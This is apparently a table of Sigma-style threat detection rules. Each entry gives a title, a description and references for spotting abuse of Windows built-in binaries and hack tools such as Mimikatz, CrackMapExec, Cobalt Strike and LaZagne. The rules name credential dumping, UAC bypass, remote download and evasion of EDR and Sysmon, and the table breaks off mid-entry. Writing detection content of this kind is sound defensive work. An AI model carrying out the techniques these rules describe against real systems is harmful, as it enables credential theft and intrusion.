Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/, https://twitter.com/harr0ey/status/992008180904419328 |
Esentutl Gather Credentials |
Detects the use of esentutl to access a dumped NTDS.dit file, as the leaked Conti playbook recommends to its affiliates. Trickbot also uses this utility to gather Microsoft Edge data via its pwgrab module. |
https://twitter.com/vxunderground/status/1423336151860002816, https://attack.mitre.org/software/S0404/, https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ |
Copying Sensitive Files with Credential Data |
Detects the copying of files with well-known filenames that contain credential data (e.g. NTDS.dit and registry hives) |
https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/, https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml |
Esentutl Steals Browser Information |
One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe |
https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/, https://redcanary.com/threat-detection-report/threats/qbot/, https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/ |
Potentially Suspicious Event Viewer Child Process |
Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt |
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 |
Potentially Suspicious Cabinet File Expansion |
Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks |
https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll, https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ |
Explorer Process Tree Break |
Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries.
This is similar to "cmd.exe /c", except that it breaks the process tree: the parent becomes a new explorer.exe instance spawned from "svchost"
|
https://twitter.com/CyberRaiju/status/1273597319322058752, https://twitter.com/bohops/status/1276357235954909188?s=12, https://twitter.com/nas_bench/status/1535322450858233858, https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ |
File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell |
Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
|
https://ss64.com/nt/shell.html |
Explorer NOUACCHECK Flag |
Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag, which allows all sub-processes of the newly started explorer.exe to run without any UAC checks |
https://twitter.com/ORCA6665/status/1496478087244095491 |
Remote File Download Via Findstr.EXE |
Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
|
https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Findstr GPP Passwords |
Detects the use of findstr to look for the encrypted "cpassword" value within Group Policy Preference files on the Domain Controller (SYSVOL). This value can be decrypted with gpp-decrypt. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr |
Findstr Launching .lnk File |
Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack |
https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/ |
LSASS Process Reconnaissance Via Findstr.EXE |
Detects findstr commands that include the keyword "lsass", which indicates recon activity to obtain the LSASS process PID |
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 |
Recon Command Output Piped To Findstr.EXE |
Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" flag, for example.
Attackers often use this technique to extract the specific information they require during the reconnaissance phase.
|
https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist, https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf, https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html |
Permission Misconfiguration Reconnaissance Via Findstr.EXE |
Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords.
This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
|
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Security Tools Keyword Lookup Via Findstr.EXE |
Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
This detection focuses on the keywords that the attacker might use as a filter.
|
https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery, https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/, https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf |
Insensitive Subfolder Search Via Findstr.EXE |
Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
|
https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE |
Detects usage of "findstr" with the argument "385201", which could indicate discovery of an installed Sysinternals Sysmon service via the default driver altitude (even if the service name has been changed). |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service |
Finger.EXE Execution |
Detects execution of the "finger.exe" utility.
Finger.EXE, or the "TCPIP Finger Command", is an old utility that is still present on modern Windows installations. It displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
Given the age of this utility and how rarely machines run a finger service, any execution of "finger.exe" can be considered suspicious and worth investigating.
|
https://twitter.com/bigmacjpg/status/1349727699863011328?s=12, https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/, http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt |
Filter Driver Unloaded Via Fltmc.EXE |
Detects filter driver unloading activity via fltmc.exe |
https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon, https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom |
Sysmon Driver Unloaded Via Fltmc.EXE |
Detects possible Sysmon filter driver unloaded via fltmc.exe |
https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon |
Forfiles.EXE Child Process Masquerading |
Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
|
https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/ |
Forfiles Command Execution |
Detects the execution of "forfiles" with the "/c" flag.
While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
Can be used to bypass application whitelisting.
|
https://lolbas-project.github.io/lolbas/Binaries/Forfiles/, https://pentestlab.blog/2020/07/06/indirect-command-execution/ |
Uncommon FileSystem Load Attempt By Format.com |
Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
|
https://twitter.com/0gtweet/status/1477925112561209344, https://twitter.com/wdormann/status/1478011052130459653?s=20 |
Use of FSharp Interpreters |
Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe"
Both can be used for AWL bypass and to execute F# code via scripts or inline.
|
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac, https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/ |
Fsutil Drive Enumeration |
Attackers may leverage fsutil to enumerate connected drives. |
Turla has used fsutil fsinfo drives to list connected drives., https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml |
Fsutil Behavior Set SymlinkEvaluation |
A symbolic link is a type of file that contains a reference to another file.
Changing the symlink evaluation behavior is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt.
|
https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware, https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior |
Fsutil Suspicious Invocation |
Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.).
Might be used by ransomware during an attack (seen with NotPetya and others).
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md, https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt |
Potential Arbitrary Command Execution Via FTP.EXE |
Detects execution of an "ftp.exe" script with the "-s" or "/s" flag and any child processes run by "ftp.exe". |
https://lolbas-project.github.io/lolbas/Binaries/Ftp/ |
Arbitrary File Download Via GfxDownloadWrapper.EXE |
Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download a file. |
https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/ |
Suspicious Git Clone |
Detects execution of "git" in order to clone a remote repository that contains suspicious keywords |
https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt |
Potentially Suspicious GoogleUpdate Child Process |
Detects potentially suspicious child processes of "GoogleUpdate.exe" |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
File Decryption Using Gpg4win |
Detects usage of Gpg4win to decrypt files |
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.gpg4win.de/documentation.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ |
File Encryption Using Gpg4win |
Detects usage of Gpg4win to encrypt files |
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.gpg4win.de/documentation.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ |
Portable Gpg.EXE Execution |
Detects the execution of "gpg.exe" from an uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. |
https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a, https://securelist.com/locked-out/68960/, https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md |
File Encryption/Decryption Via Gpg4win From Suspicious Locations |
Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. |
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ |
Arbitrary Binary Execution Using GUP Utility |
Detects execution of the Notepad++ updater (gup) to launch other commands or executables |
https://twitter.com/nas_bench/status/1535322445439180803 |
Gpresult Display Group Policy Information |
Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult, https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/, https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf |
File Download Using Notepad++ GUP Utility |
Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. |
https://twitter.com/nas_bench/status/1535322182863179776 |
Suspicious GUP Usage |
Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks |
https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html |
HH.EXE Execution |
Detects the execution of "hh.exe" to open ".chm" files. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md, https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 |
Remote CHM File Download/Execution Via HH.EXE |
Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. |
https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html, https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 |
HTML Help HH.EXE Suspicious Child Process |
Detects a suspicious child process of a Microsoft HTML Help (HH.exe) |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 |
Suspicious HH.EXE Execution |
Detects a suspicious execution of a Microsoft HTML Help (HH.exe) |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 |
HackTool - ADCSPwn Execution |
Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service |
https://github.com/bats3c/ADCSPwn |
HackTool - Bloodhound/Sharphound Execution |
Detects command line parameters used by Bloodhound and Sharphound hack tools |
https://github.com/BloodHoundAD/BloodHound, https://github.com/BloodHoundAD/SharpHound |
HackTool - F-Secure C3 Load by Rundll32 |
F-Secure C3 produces DLLs with a default exported StartNodeRelay function. |
https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12 |
HackTool - Certify Execution |
Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments. |
https://github.com/GhostPack/Certify |
HackTool - Certipy Execution |
Detects the execution of Certipy, a tool for Active Directory Certificate Services enumeration and abuse, based on PE metadata characteristics and common command line arguments.
|
https://github.com/ly4k/Certipy, https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7 |
Operator Bloopers Cobalt Strike Commands |
Detects use of Cobalt Strike commands accidentally entered in the CMD shell |
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf, https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/, https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ |
Operator Bloopers Cobalt Strike Modules |
Detects Cobalt Strike modules/commands accidentally entered in the CMD shell |
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf, https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/, https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ |
CobaltStrike Load by Rundll32 |
Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line. |
https://www.cobaltstrike.com/help-windows-executable, https://redcanary.com/threat-detection-report/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ |
Potential CobaltStrike Process Patterns |
Detects potential process patterns related to Cobalt Strike beacon activity |
https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ |
HackTool - CoercedPotato Execution |
Detects the use of CoercedPotato, a tool for privilege escalation |
https://github.com/hackvens/CoercedPotato, https://blog.hackvens.fr/articles/CoercedPotato.html |
HackTool - Covenant PowerShell Launcher |
Detects suspicious command lines used in Covenant launchers |
https://posts.specterops.io/covenant-v0-5-eee0507b85ba |
HackTool - CrackMapExec Execution |
This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been renamed. |
https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local, https://www.mandiant.com/resources/telegram-malware-iranian-espionage, https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz, https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject |
HackTool - CrackMapExec Execution Patterns |
Detects various execution patterns of the CrackMapExec pentesting framework |
https://github.com/byt3bl33d3r/CrackMapExec |
HackTool - CrackMapExec Process Patterns |
Detects suspicious process patterns found in logs when CrackMapExec is used |
https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass |
HackTool - CrackMapExec PowerShell Obfuscation |
The CrackMapExec pentesting framework implements PowerShell obfuscation with some static strings, which this rule detects. |
https://github.com/byt3bl33d3r/CrackMapExec, https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242 |
HackTool - CreateMiniDump Execution |
Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine |
https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass |
HackTool - DInjector PowerShell Cradle Execution |
Detects the use of the DInjector PowerShell cradle based on its specific flags |
https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector |
HackTool - Dumpert Process Dumper Execution |
Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory |
https://github.com/outflanknl/Dumpert, https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ |
HackTool - EDRSilencer Execution |
Detects, based on PE metadata information, the execution of EDRSilencer, a tool that leverages the Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server.
|
https://github.com/netero1010/EDRSilencer |
HackTool - Empire PowerShell Launch Parameters |
Detects suspicious PowerShell command line parameters used in Empire |
https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64 |
HackTool - Empire PowerShell UAC Bypass |
Detects some Empire PowerShell UAC bypass methods |
https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64 |
Hacktool Execution - Imphash |
Detects the execution of different Windows-based hacktools via their import hash (imphash) even if the files have been renamed |
Internal Research |
HackTool - WinRM Access Via Evil-WinRM |
Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm, https://github.com/Hackplayers/evil-winrm |
Hacktool Execution - PE Metadata |
Detects the execution of different Windows-based hacktools via PE metadata (company, product, etc.) even if the files have been renamed |
https://github.com/cube0x0, https://www.virustotal.com/gui/search/metadata%253ACube0x0/files |
HackTool - GMER Rootkit Detector and Remover Execution |
Detects the execution of the GMER tool based on image and hash fields. |
http://www.gmer.net/ |
HackTool - HandleKatz LSASS Dumper Execution |
Detects the use of HandleKatz, a tool that demonstrates the use of cloned handles to LSASS in order to create an obfuscated memory dump of the process |
https://github.com/codewhitesec/HandleKatz |
HackTool - Hashcat Password Cracker Execution |
Detects execution of Hashcat.exe with a provided SAM file from the Windows registry and a password list to crack against |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat, https://hashcat.net/wiki/doku.php?id=hashcat |
HackTool - Htran/NATBypass Execution |
Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) |
https://github.com/HiwinCN/HTran, https://github.com/cw1997/NATBypass |
HackTool - Hydra Password Bruteforce Execution |
Detects command line parameters used by Hydra password guessing hack tool |
https://github.com/vanhauser-thc/thc-hydra |
HackTool - Potential Impacket Lateral Movement Activity |
Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework |
https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py, https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html |
HackTool - Impacket Tools Execution |
Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) |
https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries |
HackTool - Impersonate Execution |
Detects execution of the Impersonate tool, which can be used to manipulate tokens on a Windows computer remotely (PsExec/WmiExec) or interactively |
https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/, https://github.com/sensepost/impersonate |
Invoke-Obfuscation COMPRESS OBFUSCATION |
Detects obfuscated PowerShell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation CLIP+ Launcher |
Detects obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation |
Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the referenced code block |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher |
Detects obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher |
Detects obfuscated use of environment variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
HackTool - Inveigh Execution |
Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool |
https://github.com/Kevin-Robertson/Inveigh, https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ |
Invoke-Obfuscation Via Stdin |
Detects obfuscated PowerShell via stdin in scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip |
Detects obfuscated PowerShell via use of Clip.exe in scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA |
Detects obfuscated PowerShell via use of MSHTA in scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION |
Detects obfuscated PowerShell via the VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
HackTool - Jlaive In-Memory Assembly Execution |
Detects the use of Jlaive to execute assemblies in a copied PowerShell |
https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool, https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive |
HackTool - Koadic Execution |
Detects command line parameters used by Koadic hack tool |
https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/, https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js, https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/ |
HackTool - KrbRelay Execution |
Detects the use of KrbRelay, a Kerberos relaying tool |
https://github.com/cube0x0/KrbRelay |
HackTool - KrbRelayUp Execution |
Detects the use of KrbRelayUp to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced |
https://github.com/Dec0ne/KrbRelayUp |
HackTool - RemoteKrbRelay Execution |
Detects the use of RemoteKrbRelay, a Kerberos relaying tool, via command line flags and PE metadata.
|
https://github.com/CICADA8-Research/RemoteKrbRelay |
HackTool - LaZagne Execution |
Detects the execution of LaZagne, a utility used to retrieve multiple types of passwords stored on a local computer.
LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
|
https://github.com/AlessandroZ/LaZagne/tree/master, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/, https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/, https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf |
HackTool - LocalPotato Execution |
Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples |
https://www.localpotato.com/localpotato_html/LocalPotato.html, https://github.com/decoder-it/LocalPotato |
Potential Meterpreter/CobaltStrike Activity |
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ |
HackTool - Mimikatz Execution |
Detects well-known Mimikatz command line arguments |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://tools.thehacker.recipes/mimikatz/modules |
HackTool - PCHunter Execution |
Detects suspicious use of PCHunter, a tool similar to Process Hacker for viewing and manipulating processes, kernel options and other low-level internals |
https://web.archive.org/web/20231210115125/http://www.xuetr.com/, https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/, https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/ |
HackTool - Default PowerSploit/Empire Scheduled Task Creation |
Detects the creation of a schtask via PowerSploit or Empire Default Configuration. |
https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py |
HackTool - PowerTool Execution |
Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files |
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html, https://twitter.com/gbti_sa/status/1249653895900602375?lang=en, https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml |
HackTool - Pypykatz Credentials Dumping Activity |
Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored |
